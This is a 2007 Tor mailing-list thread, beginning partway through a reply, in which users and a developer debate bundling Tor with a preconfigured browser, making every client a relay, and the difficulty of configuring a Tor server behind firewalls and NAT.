does, what it doesn't do, how it does it, how it is circumvented, how to
check if it is working correctly, etc. One of the major reasons there is
so much tracking of personal data on the web is most users' lack of
responsibility for their own privacy and security.

  For these reasons, my concern is that making TOR a 3 click wonder will
not only further propagate this "some one else will worry about my
privacy/security for me" thinking and ultimately would lead people to a
false sense of security because they won't properly understand the TOR
network, and will blissfully find ways to make their computer leak more
than a bucket with no bottom, all the while thinking "oh, it's fine,
I've got TOR on, I can see the icon in the systray right there".

  I feel that rather than head down the 3 click wonder path, it would be
better to invest time in reminding users that we are talking about their
security, or their anonymity, that as such it is their responsibility,
and decidedly worth the time to learn as much as possible about the
programs or systems they use to protect it. 

  I would hate to see the day when the TOR team has to waste countless
hours and resources to battle complaints that "TOR failed to protect me
when I ".

Just my thoughts on the subject

Freemor

P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
That just snuck in there as I deal with computer security regularly and
often see the same "the computer/internet/isp/mysterious someone" should
take care of that for me mentality.   

On Fri, 2007-23-03 at 02:44 -0700, JT wrote:
> Hi,
> 
> why spend hundreds and thousands of hours of coding?
> 
> Is there a browser that doesn't support javascript, java, flash,
> quicktime, etc but only pictures so one can read html text and pictures
> and can read a normal newspaper? If there is such a browser why not
> force Tor users to use it? Make Tor only work with that browser.
> 
> If Tor wants to be an anonymous communication tool it should come in an
> entire package. If Tor wants to be successful it MUST come in a complete
> package.
> 90% of the users use it to surf anonymously, the rest use ftp, chat or
> whatever.
> 
> How about instead of telling a user to:
> 
> install tor and vidalia
> activate tor
> install the tor button
> install the noscript
> install flashblock
> configure noscript
> deactivate flash, etc
> install cookie culler 
> turn off the referer header in the browser
> etc
> etc
> 
> have them just install the "package for free communication".
> That way there is no way they can forget to turn anything off or on.
> That way every person that uses the "Tor package for free communication"
> can benefit from the expertise of the people that release the package.
> All the "hacks" that are published are not against Tor but against the
> users "communication package" that the users put together himself. Why
> not help/force internet noobs to be safe.
> 
> I know it is called the Tor project but why not extend it to a real
> communication package. Vidalia was a good start. Now one step further!!
> 
> Is there a free open source browser that could be shipped with the Tor
> package that is fully configured for anonymous surfing and fine tuned to
> be most anonymous, set so that it can be only used through Tor? It
> should be modified so that a noob can not change the settings by
> accident.
> 
> I am not a programmer but this is what must happen. If Tor is only
> supposed to be for technical experts and people that hang out in
> security forums every day then we should continue as is but if Tor is
> supposed to be for the masses (more people, more distributed trust) then
> there must be a bundle. A package with everything set up for anonymous
> browsing where some internet newbie can not possibly reveal his IP by
> misconfiguration. The user clicks the setup program Tor installs, the
> Tor browser opens, ready to go. No way the surfer can use that browser
> without Tor.
> 
> Such a software package would make Moore's publications completely
> unnecessary.
> 
> I wish I could help implement this but I am not a programmer.
> 
> But this is the only way for Tor to succeed. A software bundle including
> perfectly configured browser, every user must be a server, and there
> must be a button with which people can choose to be an exit or not.
> Right now it is way too difficult. If grandma and grandpa are capable of
> choosing to be a serv

Re: Ultimate solution

2007-03-23 Thread phobos
On Fri, Mar 23, 2007 at 03:32:15PM +, [EMAIL PROTECTED] wrote 0.8K bytes in 
20 lines about:
: Yes, please come out with a ready server package. I am
: a noob who sometimes doesn't even understand the
: messages in the log (and not at all the debug log).

Tor is a server and client in the same package.  Configuring Tor
as a server is easy.  Configuring the rest of your network and
firewalls to allow traffic to ebb and flow is not always so
easy.  Even if there existed a LiveCD for a Tor server that
magically configures itself on start, getting it to work with
the network isn't so "boot and run" easy.  There is a 3-step
process to getting a Tor server up and running:

http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#CanIJustConfigureAndRun

Or you can use Vidalia to make it easier.  The hard part is
firewalls, NAT, port forwarding, etc.  Universal Plug and Play
(UPNP) is used by some vendors to make their software
autoconfigure the network for you.  Most security conscious
people disable UPNP because of the poor implementations from a
security perspective.  Search the web for "UPNP exploits", for an
example.  Therefore, this makes the problem set Tor has to test
and solve far more complex.  We rely upon the user to know their
network better than Tor can ever ascertain.  

Our FAQ tries to answer many of these questions for you.  Or,
there is OR-TALK for help.  If our documentation is lacking,
please let us know how to make it more clear and better.  We'll
also happily accept updates to the wiki or patches to the actual
docs.  

We'll happily accept "Tor Server in a box" type bundles.  If you
can magically figure out the networking parts of it, "go you!"  

-- 
Andrew


Re: Ultimate solution

2007-03-23 Thread sy16
Thank you JT, you expressed so eloquently what I have
been thinking.

Yes, please come out with a ready server package. I am
a noob who sometimes doesn't even understand the
messages in the log (and not at all the debug log). I
have been trying to get my boxes to run as servers for
weeks. No luck. And I don't know where and how to get
help. I am very grateful for the security tor has
given me, and would like to contribute to the
community instead of just taking, taking. It would be
great if we could have a default server package.







Re: Ultimate solution

2007-03-23 Thread JT

On Fri, 23 Mar 2007 20:13:30 +0800, "Tin Tin" <[EMAIL PROTECTED]> said:
> > why spend hundreds and thousands of hours of coding?
> 
> Torpark is a start, no?

Thx but no thx.

1) Torpark is only for windows
2) Torpark is commercial
3) no distributed trust
4) they want you to install flash player for an online tutorial
5) stuck up marketing people say it is offshore. offshore from what?
antarctica?
6) they advertise that Torpark was developed by Hackers. a statement
like that attracts the wrong people

A browser that leaves no traces is great, yes.

I don't believe in commercial anonymity solutions. Companies can develop
lots of great useful software but an anonymity service needs to be open
source, not bound to one jurisdiction, decentralized and dedicated to
security (not already telling people to install dangerous software like
flash before they even signed up). How professional is that?

I still believe Tor must be bundled with a browser that is perfectly
configured to be run with Tor. Nothing commercial. Along with a
webserver that starts with Tor and is also preconfigured by Tor
experts (maybe we can bring an Apache expert into the Tor team).
Every user must be a router giving a certain percentage of their
bandwidth, otherwise Tor will not work.
The people that object to this can choose to use different software. But
I doubt that there would be any. Look at all the P2P networks. People
give their bandwidth because there is no other way. Nobody complains. -->
emule

Also, I just searched 7 different security communities for the keyword
"Tor". On 6 of them people asked if there was anything faster than Tor.
The number of Tor servers will increase extremely slowly with the current
implementation. Only experts that can figure out how to set up a server
will contribute to the speed. I am not a computer genius but it took me
a while to figure out how a Tor server works. Now how can a noob run a
Tor server?
Only if he is one by default.

But now imagine a total computer noob with an extremely fast connection
who just joined the network. He doesn't know anything about the
internal workings of Tor, and he doesn't have to, and still he can
contribute so much to make Tor better by contributing his very fast
internet connection. If every user has a chance to use a webserver that
is already ready to go, a real Tor internet will start to evolve and
people won't need to exit the Tor network. There won't be time to check
out www pages if there are tons of Tor pages. :)

Also if the client base becomes the router base the distributed trust
explodes. The biggest contributors in terms of servers right now are the USA
and Germany.
If they ban anonymity services in Germany (which is not so unlikely) it
is going to be a problem for the network. But if every user is a router,
then even a grandma in Kenya whose nephew set up her Tor software or an
internet cafe in Chile can contribute to distributed trust without
having to configure anything. The number of possible circuits would
explode. And nobody could just start a boulder type attack.
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - Does exactly what it says on the tin



Re: Ultimate solution

2007-03-23 Thread Tin Tin

why spend hundreds and thousands of hours of coding?


Torpark is a start, no?


Ultimate solution

2007-03-23 Thread JT
Hi,

why spend hundreds and thousands of hours of coding?

Is there a browser that doesn't support javascript, java, flash,
quicktime, etc but only pictures so one can read html text and pictures
and can read a normal newspaper? If there is such a browser why not
force Tor users to use it? Make Tor only work with that browser.

If Tor wants to be an anonymous communication tool it should come in an
entire package. If Tor wants to be successful it MUST come in a complete
package.
90% of the users use it to surf anonymously, the rest use ftp, chat or
whatever.

How about instead of telling a user to:

install tor and vidalia
activate tor
install the tor button
install the noscript
install flashblock
configure noscript
deactivate flash, etc
install cookie culler 
turn off the referer header in the browser
etc
etc

have them just install the "package for free communication".
That way there is no way they can forget to turn anything off or on.
That way every person that uses the "Tor package for free communication"
can benefit from the expertise of the people that release the package.
All the "hacks" that are published are not against Tor but against the
users "communication package" that the users put together himself. Why
not help/force internet noobs to be safe.

I know it is called the Tor project but why not extend it to a real
communication package. Vidalia was a good start. Now one step further!!

Is there a free open source browser that could be shipped with the Tor
package that is fully configured for anonymous surfing and fine tuned to
be most anonymous, set so that it can be only used through Tor? It
should be modified so that a noob can not change the settings by
accident.

I am not a programmer but this is what must happen. If Tor is only
supposed to be for technical experts and people that hang out in
security forums every day then we should continue as is but if Tor is
supposed to be for the masses (more people, more distributed trust) then
there must be a bundle. A package with everything set up for anonymous
browsing where some internet newbie can not possibly reveal his IP by
misconfiguration. The user clicks the setup program Tor installs, the
Tor browser opens, ready to go. No way the surfer can use that browser
without Tor.

Such a software package would make Moore's publications completely
unnecessary.

I wish I could help implement this but I am not a programmer.

But this is the only way for Tor to succeed. A software bundle including
perfectly configured browser, every user must be a server, and there
must be a button with which people can choose to be an exit or not.
Right now it is way too difficult. If grandma and grandpa are capable of
choosing to be a server or exit nodes then Tor will become extremely
popular and successful. But everybody must be a router (like I2P). There
is no other way. Taking the client user base and making it a router base
would solve many problems and the possible combinations of paths (n-k-1
over k) would be so huge that an attack where the adversary controls all
routers in the path would be almost impossible.
-- 
  JT
  [EMAIL PROTECTED]

-- 
http://www.fastmail.fm - Does exactly what it says on the tin